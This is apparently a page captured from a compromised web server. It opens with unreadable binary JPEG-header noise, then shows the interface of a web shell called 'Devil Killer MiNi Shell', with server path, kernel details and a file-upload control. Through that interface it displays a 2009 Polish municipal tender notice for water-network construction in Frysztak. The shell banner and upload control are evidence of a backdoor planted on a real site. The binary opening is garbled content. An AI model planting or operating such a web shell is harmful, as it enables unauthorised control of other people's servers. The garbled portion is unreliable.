JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090709/108285-N-2009.html

<p class="kh_header"><b>Frysztak: Wykonanie robót budowlanych w ramach  projektu: Poprawa podstawowych usług dla gospodarki i ludności wiejskiej poprzez budowę i   przebudowę sieci wodociągowej z rozbudową i nadbudową Stacji Uzdatniania Wody we   
            Frysztaku wraz z modernizacją technologii uzdatniania wody- Etap I: budowa  i przebudowa  sieci wodociągowej.</b><br>
<b>Numer ogłoszenia: 108285 - 2009; data zamieszczenia: 09.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Frysztak , ul. Księdza Wojciecha Blajera 20, 38-130 Frysztak, tel. 017 27777110 w. 302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frysztak.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w ramach  projektu: Poprawa podstawowych usług dla gospodarki i ludności wiejskiej poprzez budowę i   przebudowę sieci wodociągowej z rozbudową i nadbudową Stacji Uzdatniania Wody we   
            Frysztaku wraz z modernizacją technologii uzdatniania wody- Etap I: budowa  i przebudowa  sieci wodociągowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach projektu -Poprawa podstawowych usług dla gospodarki i ludności wiejskiej poprzez budowę i przebudowę sieci wodociągowej z rozbudową i nadbudową Stacji Uzdatniania Wody we Frysztaku wraz z modernizacją technologii uzdatniania wody, o dofinansowanie, którego w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013,  - działanie 321 -Podstawowe usługi dla gospodarki i ludności wiejskiej, ubiega się zamawiający.
Etap I: budowa  i przebudowa sieci wodociągowej.
W zakres projektu wchodzą następujące zadania inwestycyjne:
1). Budowa sieci wodociągowej w miejscowości Frysztak oraz sieci wodociągowej z  przyłączami do budynków i zasilaniem energetycznym w miejscowości Kobyle. 
W ramach zadania wykonane zostaną:
a) Roboty ziemne - sieć wodociągowa						mb 12564
b) Roboty montażowe - sieć wodociągowa						mb 12564
c) Roboty ziemne - przyłącza wodociągowe						mb 2832
d) Roboty montażowe - przyłącza wodociągowe					mb 2832
e) Roboty ziemne - przekroczenia dróg (komory przewiertowe)			kpl	1
f) Roboty montażowe - przekroczenia dróg metodą podwiertu			kpl	1
g) Roboty drogowe - przekroczenia dróg metodą rozkopu				kpl	1
h) Roboty ziemne - przekroczenia dróg metodą rozkopu				kpl	1
i) Roboty montażowe - przekroczenia dróg metodą rozkopu - rury ochronne	kpl	1
j)Roboty montażowe instalatorskie w pompowni SUW				kpl	1
k)Roboty elektryczne w pompowni SUW						kpl	1
l)Roboty ziemne - pompownia P2							kpl	1
ł)Roboty budowlane - pompownia P2						kpl	1
m)Roboty ziemne - zasilanie pompowni P2						kpl	1
n)Roboty elektryczne - zasilanie pompowni P2					kpl	1
o)Roboty elektryczne w budynku SUW						kpl	1
p)Roboty montażowe w budynku SUW						kpl	1

2).Budowa sieci wodociągowej w m.Frysztak, Pułanki i Glinik Dolny oraz przebudowa  sieci wodociągowej z przyłączami w m. Frysztak, Pułanki i Glinik Dolny
W ramach zadania wykonane zostaną:
a) Przyłącza wodociągowe - jako koszty niekwalifikowane				mb	217
b) Przyłącza wodociągowe - jako koszty kwalifikowane				mb	428
c) Sieć wodociągowa - m. Pułanki							mb      1109
d)Przebudowa sieci wodociągowej - ul. Wybickiego				mb	630
e)Przebudowa sieci w ul. Blajera, Frysztackiego i Br. Dymnickich			mb      1273
f) przekroczenia dróg 									kpl 	1
g) roboty ziemne 									kpl.      1 
h) roboty montażowe 									kpl.  	1

Uwaga:
1.Każde z zadań, o których mowa wyżej,  stanowi odrębny proces budowlany, realizowany na podstawie  odrębnych decyzji o pozwoleniu na budowę oraz w oparciu o odrębne dokumentacje projektowe i odrębne specyfikacje techniczne wykonania i odbioru robót budowlanych. Oba zadania budowlane będą  realizowane w  zbieżnych przedziałach czasowych.  
2. Wykonawca uwzględni w swojej ofercie wszystkie koszty ujęte w przedmiarze robót jak również koszty nie ujęte w przedmiarze i dokumentacji technicznej a niezbędne do realizacji zadania, min.  koszty związane z:
- wszelkimi kosztami  związanymi ze zużyciem wody i energii elektrycznej, zagospodarowaniem odpadów 
- utrzymaniem placu budowy,
- ubezpieczeniem budowy,
- wykonaniem projektów tymczasowej zmiany organizacji ruchu (w zakresie wynikającym z potrzeb inwestycji), zabezpieczenia terenu robót (oznakowania),
-realizacją stosownych uzgodnień niezbędnych do realizacji zamówienia,
3.Ze względu na rozmiar plików dokumentacji projektowej i możliwymi trudnościami technicznymi z jej otworzeniem ze strony BIP  www.frysztak.pl Zamawiający udostępni część dotyczącą projektów budowlanych na nośnikach CD  -na wniosek Wykonawcy . Całość dokumentacji w wersji papierowej do wglądu w pokoju numer 14 Urzędu Gminy Frysztak  w godzinach pracy Urzędu.  Przepraszamy za utrudnienia.
2. Szczegółowy zakres robót związany z realizacją zadania pn.:
1) Budowa sieci wodociągowej w miejscowości Frysztak oraz sieci wodociągowej z  przyłączami do budynków i zasilaniem energetycznym w miejscowości Kobyle
2)Budowa sieci wodociągowej w m.Frysztak , Pułanki i Glinik Dolny oraz przebudowa  sieci wodociągowej z przyłączami w m. Frysztak , Pułanki i Glinik Dolny
zawarty jest w projektach budowlano-wykonawczych, specyfikacjach technicznych wykonania i odbioru robót oraz przedmiarach robót.
3. Wskazania materiałów z nazwy w załączonej dokumentacji projektowej należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych materiałów stosowanych do realizacji przedmiotu zamówienia a zamawiający dopuszcza zastosowanie materiałów równoważnych spełniających te parametry techniczne i jakościowe. 

4. Miejsce realizacji zamówienia:
Miejscowość : Frysztak, Pułanki ,Glinik Dolny, Kobyle - gmina Frysztak, woj. Podkarpackie.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium:
2.Wadium wnosi się przed upływem terminu składania ofert w jednej lub kilku formach  określonych w art. 45 ust.6 ustawy PZP. W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego zamawiającego.
3. Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
4.Wykonawca zobowiązany jest do wniesienia wadium w wysokości 50 000,00zł (słownie: pięćdziesiąt tysięcy złotych) do dnia 31.07.2009 r. do godz. 10:30 w wybranej przez siebie formie dopuszczonej ustawą Prawo zamówień publicznych . Wadium musi być wniesione przed upływem terminu składania ofert
5.Wadium należy wnieść na adres  Gminy Frysztak, 38-130 Frysztak, ul. Ks. W. Blajera 20 .
6.W przypadku wpłaty wadium w formie pieniężnej , należy wpłacić go na rachunek  Gminy Frysztak  w Banku Spółdzielczym Strzyżów O Frysztak nr rach: 
 95 9168 1027 5505 8519 2000 0005 - wyłącznie w formie przelewu.
7.Jeżeli wadium zostanie wniesione w pieniądzu -przelewem, wykonawca dołączy do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu .W tytule przelewu należy wpisać : wadium - wykonanie robót budowlanych w ramach  projektu Etap I: budowa  i przebudowa sieci wodociągowej  
8.Wykonawca , który nie wniósł wadium zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
9.Wykonawcy , którzy wnieśli wadium niestanowiące całości wymaganej kwoty lub , gdy forma jest niezgodna z pkt.XII ust.2 -7 SIWZ - zostaną wykluczeni z postępowania.
10. Wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 46 ustawy  prawo zamówień publicznych z dnia 29 stycznia 2004 roku.
11.Zamawiający zatrzyma wadium wraz z odsetkami ,jeżeli wykonawca na wezwanie zamawiającego nie uzupełni wymaganych dokumentów ,oświadczeń lub pełnomocnictw, chyba, że udowodni , iż wynika to z przyczyn niezależnych od niego.
12.Złożenie prze wykonawcę , którego oferta została odrzucona lub wykluczonego z postępowania , wniosku o zwrot wadium jest równoznaczne ze  zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
13. Jeżeli wadium wniesiono w pieniądzu , zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego , na którym było ono przechowywane , pomniejszone o koszty prowadzenia rachunku bankowego ora prowizji za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14.Wykonawca traci wadium na rzecz zamawiającego, jeżeli:
- odmówi podpisania umowy w sprawie zamówienia pub licznego na warunkach określonych w ofercie 
-nie wniesie zabezpieczenia należytego wykonania umowy 
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia publicznego mogą się ubiegać się  wykonawcy spełniający warunki określone w art. 22 ust. 1 Ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych, tj :
1).Posiadać uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2).Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do  wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3).Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4).Nie podlegać wykluczeniu z postępowania o udzielenie zamówienia 

2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy:
1). Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, z art.22 Prawa zamówień publicznych 
2). Podlegają wykluczeniu z postępowania na podstawie art.24 ust.1 i 2 Prawa zamówień publicznych 
3).Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności  chyba, że udział tych Wykonawców w postępowaniu nie utrudni uczciwej konkurencji
4).Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.
5) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art.26 ust. 3 Prawa zamówień publicznych.
6). Nie wnieśli wadium , w tym również na przedłużony okres związania z ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą.
3. Zamawiający odrzuca ofertę, jeżeli:   
1).Jest niezgodna z ustawą
2).Jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia z zastrzeżeniem art.87 ust.2 pkt 3 ustawy
3).Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji
4). Zawiera rażąco niska cenę w stosunku do przedmiotu zamówienia
5). Została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert
6). Zawiera  błędy w obliczeniu ceny.
7).Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki , o której mowa w art.87 ust.2 pkt.3 ustawy
8). Jest nieważna na podstawie odrębnych przepisów
9). Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
4.Wykonawca zobowiązany jest zapewnić wykonanie i kierowanie robotami specjalistycznymi objętymi umową przez osoby posiadające stosowne kwalifikacje zawodowe i  uprawnienia budowlane, tj. osoby kierujące poszczególnymi robotami budowlanymi muszą posiadać uprawnienia budowlane w specjalności:
1.konstrukcyjno - budowlanej 
2.instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych,  
3.instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
Ponadto każda z tych osób musi przynależeć do Okręgowej Izby Inżynierów Budownictwa.
Wykonawca zobowiązany jest wskazać w ofercie, która z ww. osób będzie nadzorować proces budowlany w świetle ustawy Prawo budowlane (kierownik budowy) .

Uwaga:
W ramach realizacji zadania Wykonawca zobowiązuje się wykonywać wszelkie roboty i czynności z nimi związane w sposób zapewniający funkcjonowanie  sieci wodociągowej w sposób zapewniający jak najmniejszą uciążliwość dla użytkowników sieci ,a wyłączenia dopływu wody do sieci będą dokonywane na czas niezbędny do wykonania przyłączeń lub niezbędnych robót instalacyjnych.

5.Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu
Ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez wykonawców wszystkich kryteriów określonych w niniejszej SIWZ na zasadzie spełnia-nie spełnia, tzn. każdy z wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie muszą złożyć wykonawcy wraz z pisemną 
ofertą, w celu potwierdzenia spełniania warunków udziału w postępowaniu:  

1. OŚWIADCZENIA
1). Oświadczenie o spełnieniu warunków udziału w postępowaniu o treści zgodnej z określoną w załączniku nr 2  do SIWZ., tzn.
a)oświadczenie, że wykonawca posiada uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
b)oświadczenie, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub oświadczenie, że Wykonawca będzie dysponował potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (w tym przypadku należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia) albo oba te dokumenty łącznie,
c)oświadczenie, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej   zapewniającej wykonanie zamówienia,
d)oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia z powodów wymienionych w ustawie Prawo zamówień publicznych , tj.
     -,  że nie wyrządził szkody nie wykonując zamówienia lub wykonując je nienależycie (art. 24 ust. 1 pkt 1 ustawy). Pod pojęciem wyrządzonej szkody należy rozumieć szkodę, która została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie trzech lat przed wszczęciem postępowania;
     -, że, w stosunku do Wykonawcy nie otwarto likwidacji ani nie ogłoszono upadłości chyba, że po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
     -,  że nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne                           lub zdrowotne (art.24 ust.1 pkt 3 ustawy) lub, że uzyskał zgodę na zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji organu podatkowego;
    -  w przypadku osoby fizycznej, że nie została prawomocnie skazana za przestępstwo          popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w  zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego;
    -  w przypadku spółki jawnej, że wspólnik nie został prawomocnie skazany za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego;
    -  w przypadku spółki partnerskiej, że partner lub członek zarządu nie został prawomocnie skazany za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko  prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu  osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego;
   -  w przypadku spółki komandytowej oraz spółki komandytowo-akcyjnej, że komplementariusz nie został prawomocnie skazany za przestępstwo  popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu   osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w  zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego;
   -  w przypadku osób prawnych, że urzędujący członek organu zarządzającego nie został prawomocnie skazany za przestępstwo popełnione w związku z postępowaniem  o udzielenie zamówienia, przestępstwo przeciwko  prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w  zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa  lub przestępstwa  skarbowego;
w przypadku podmiotów zbiorowych, że sąd nie orzekł zakazu ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione  pod groźbą kary;
że wykonawca nie wykonywał bezpośrednio czynności związanych z przygotowaniem prowadzonego postępowania lub nie posługiwał się w celu sporządzenia oferty osobami uczestniczącymi w  dokonywaniu tych czynności chyba, że udział takiego wykonawcy w postępowaniu nie utrudni  uczciwej  konkurencji,
Uwaga: 
Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej oraz podmioty te występujące wspólnie, o ile spełniają warunki określone w ustawie Prawo zamówień publicznych oraz niniejszej specyfikacji.
         2)Oświadczenie informujące o częściach zamówienia, jakie wykonawca zamierza zlecić  
          podwykonawcom, 
         3)Oświadczenie, iż wykonawca wyraża zgodę na realizację faktury przejściowej VAT oraz    
         faktury końcowej VAT w terminie 30 dni od daty ich doręczenia do Zamawiającego,
4)oświadczenie, że wykonawca akceptuje załączony do SIWZ wzór umowy i zobowiązuje się do  zawarcia umowy na wymienionych w niej warunkach,
         5)oświadczenie o udzieleniu gwarancji na wykonany przedmiot zamówienia na okres  
          minimum 36 miesięcy, licząc od daty wykonania i odbioru końcowego prac. 
2. DOKUMENTY
            1)Na potwierdzenie warunku posiadania uprawnień niezbędnych do wykonania zamówienia -  
            Wykonawca przedkłada :
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
b)aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
c)aktualną informację z Krajowego Rejestru Krajowego w zakresie określonym w art.24 ust.1 pkt.4-8 ustawy ,  wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
d)aktualną informację z Krajowego Rejestru Krajowego w zakresie określonym w art.24 ust.1 pkt.9 ustawy ,  wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)Na potwierdzenie spełnienia warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  - Wykonawca przedkłada :
a) wykaz robót zrealizowanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane należycie np. referencje. Warunek zostanie uznany za spełniony , jeżeli w tych latach wykonawca wykonał, : co najmniej 1 (jedną) robotę w zakresie związanym z budową lub modernizacją sieci wodociągowej o długości sieci przesyłowej wody  minimum 10 000 mb.
b) wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
c) dokumenty  potwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia. Na potwierdzenie należy załączyć uprawnienia budowlane do kierowania:
-robotami budowlanymi  w specjalności konstrukcyjno - budowlanej, aktualny wpis na listę członków właściwej izby samorządu zawodowego 
-robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych ,aktualny wpis na listę członków właściwej izby samorządu zawodowego 
-robotami elektrycznymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, aktualny wpis na listę członków właściwej izby samorządu zawodowego 
       3). W celu potwierdzenia , że wykonawca znajduje się w sytuacji ekonomicznej i finansowej   
            zapewniającej wykonanie zamówienia, ocena potencjału ekonomicznego dokonana będzie    
            z punktu widzenia możliwości realizacji zamówienia .Warunek zostanie uznany za   
            spełniony , jeżeli wykonawca przedłoży:  
		a) polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest 	ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na 	kwotę nie mniejszą niż 500 000,00 ( słownie: pięćset tysięcy złotych) 
	b) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej , w której  	wykonawca posiada rachunek , potwierdzającą wysokość posiadanych środków 	finansowych lub zdolność kredytową wykonawcy nie niższą niż 1 mln zł( jeden milion  złotych) wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  
